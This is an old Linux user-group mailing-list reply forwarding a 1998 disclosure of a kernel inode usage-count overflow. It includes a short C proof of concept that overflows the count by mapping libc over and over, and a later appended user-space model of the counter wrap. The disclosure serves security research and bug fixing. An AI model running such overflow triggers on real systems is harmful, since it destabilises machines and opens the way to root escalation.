
Re: [luga] Linux inode.i_count overflow



On Wednesday, 21 Jan 1998 9:9, Vinzenz Grabner wrote:
> 
> Subject: BoS:      Linux inode.i_count overflow
> 
> 
> http://www.ms.mff.cuni.cz/~jkot2155/linuxbug.html
> 
>    While I was working on my master thesis (Emulation of [1]Classic
>    Operating Systems in [2]Distributed Environment), I found the following
>    two nasty things in the Linux sources:
> 
>                         i_count Overflow Security Hole
> 
>    Member i_count in struct inode contains the usage count. It is of type
>    unsigned short, which is only 16-bit long on i386. Unfortunately, it
>    is not enough. You can make it overflow by mapping one file many
>    times:
> #include <unistd.h>
> #include <fcntl.h>
> #include <sys/mman.h>
> 
> int main(void)
> {
>  int fd, i;
> 
>  /* one file, mapped over and over: every MAP_SHARED mapping takes
>   * one more reference on the same inode */
>  fd = open("/lib/libc.so.5", O_RDONLY);
>  if (fd < 0)
>   return 1;
> 
>  /* 65540 mappings push a 16-bit usage count past 65535 */
>  for(i = 0; i < 65540; i++)
>  {
>   mmap((char*)0x50000000 + (0x1000 * i), 0x1000,
>    PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
>  }
>  return 0;
> }
> 
>    Warning: This program will cause unpredictable behavior of the whole
>    system!!!
> 
>    While killing this program, the kernel will print many messages:
> VFS: iput: trying to free free inode
> 
>    After executing the program, there will be a free inode which is
>    actually mapped in other processes. The only thing you need to grab
>    root privileges is opening your modified libc in the original inode and
>    making the system use it. It is a little tricky magic with the inode cache
>    and the memory manager. I will not publish it here to avoid misuse of this
>    security hole.
> 
>    To fix this bug simply change the i_count type to unsigned long.

Hmm, and why can't I overflow it?

> 
>   Related links
> 
>      * [3]Reply to my linux-security post
[...] 
> References
> 
>    1. http://www.linux.org/
>    2. http://ulita.ms.mff.cuni.cz/pub/t4/
>    3. http://www.ms.mff.cuni.cz/~jkot2155/linuxbug/wolff.txt.iso-8859-1
>    4. mailto:Jan.Kotas@acm.org
> 
> 
> 
> ------- End of Forwarded Message
> 
> 


Ciao,
	Bernd

--
 Bernd Petrovitsch                  Institute of Computer Technology
 Gußhausstraße 25-29, A-1040 Vienna    Email: bernd@ict.tuwien.ac.at
 "...Unix, MS-DOS, and Windows NT (also known as the Good, the Bad, 
 and the Ugly)."                                     (By Matt Welsh)
 UNIX is user-friendly ... it's just selective about who its friends
 are !!                                 2 is the oddest prime number
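The wrap in the forwarded report, replayed in a user-space model as an added example; this is neither the report's program nor kernel code, and the names `struct inode`, `iget`, `iput`, `replay` and `struct outcome` are hypothetical. It assumes the count starts at zero and that every MAP_SHARED mapping of the file takes one reference that munmap() later drops, and it goes beyond the report by also showing a checked (saturating) counter and the case where the count wraps exactly to zero.

```c
#include <stdbool.h>

/* Hypothetical user-space model of the kernel's inode usage count, built to
 * replay the report above; it is not kernel code. `max` is the largest value
 * the field can hold: 65535 for the unsigned short of the report, 4294967295
 * for the unsigned long it proposes as the fix. */
struct inode {
    unsigned long i_count;
    unsigned long max;         /* always 2^n - 1, so (x & max) truncates to n bits */
    bool freed;                /* set when iput() drops the count to zero */
    unsigned long bogus_puts;  /* iput() calls on an already "free" inode */
};
struct outcome { unsigned long live_at_free, bogus_puts; };
/* Take a reference. Unchecked: wraps to 0 past max, as the 16-bit field did.
 * Checked: refuses the reference at max (saturating), so the caller fails
 * cleanly instead of corrupting the count. */
static bool iget(struct inode *ip, bool checked) {
    if (checked && ip->i_count == ip->max) return false;
    ip->i_count = (ip->i_count + 1) & ip->max;
    return true;
}
/* Drop a reference; a put on a zero count is the "trying to free free inode" case. */
static void iput(struct inode *ip) {
    if (ip->i_count == 0) { ip->bogus_puts++; return; }
    if (--ip->i_count == 0) ip->freed = true;
}
/* Replay the report: open() takes one reference, each MAP_SHARED mapping takes
 * another, then every mapping and the descriptor are released. live_at_free is
 * how many references were still outstanding when the inode was marked free
 * (0 means it was freed at the last put, the correct outcome). */
struct outcome replay(unsigned long max, bool checked, unsigned long mappings) {
    struct inode ino = { 0, max, false, 0 };
    struct outcome out = { 0, 0 };
    unsigned long held = 0, to_release, i;

    if (iget(&ino, checked)) held++;                     /* open() */
    for (i = 0; i < mappings; i++)                       /* mmap() x N: a refused */
        if (iget(&ino, checked)) held++;                 /* get means mmap() fails */
    to_release = held;
    for (i = 0; i < to_release; i++) {                   /* munmap() x N, then close() */
        bool was_freed = ino.freed;
        held--;
        iput(&ino);
        if (!was_freed && ino.freed) out.live_at_free = held;
    }
    out.bogus_puts = ino.bogus_puts;
    return out;
}
```

With the report's 65540 mappings the 16-bit count wraps to 5, so the inode is marked free while 65536 mappings still reference it and the remaining puts each hit the "free free inode" path; with 65535 mappings the count wraps exactly to zero and the inode is instead never freed, a leak rather than a use-after-free.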
Last change: September 2010 (webmaster@luga.at)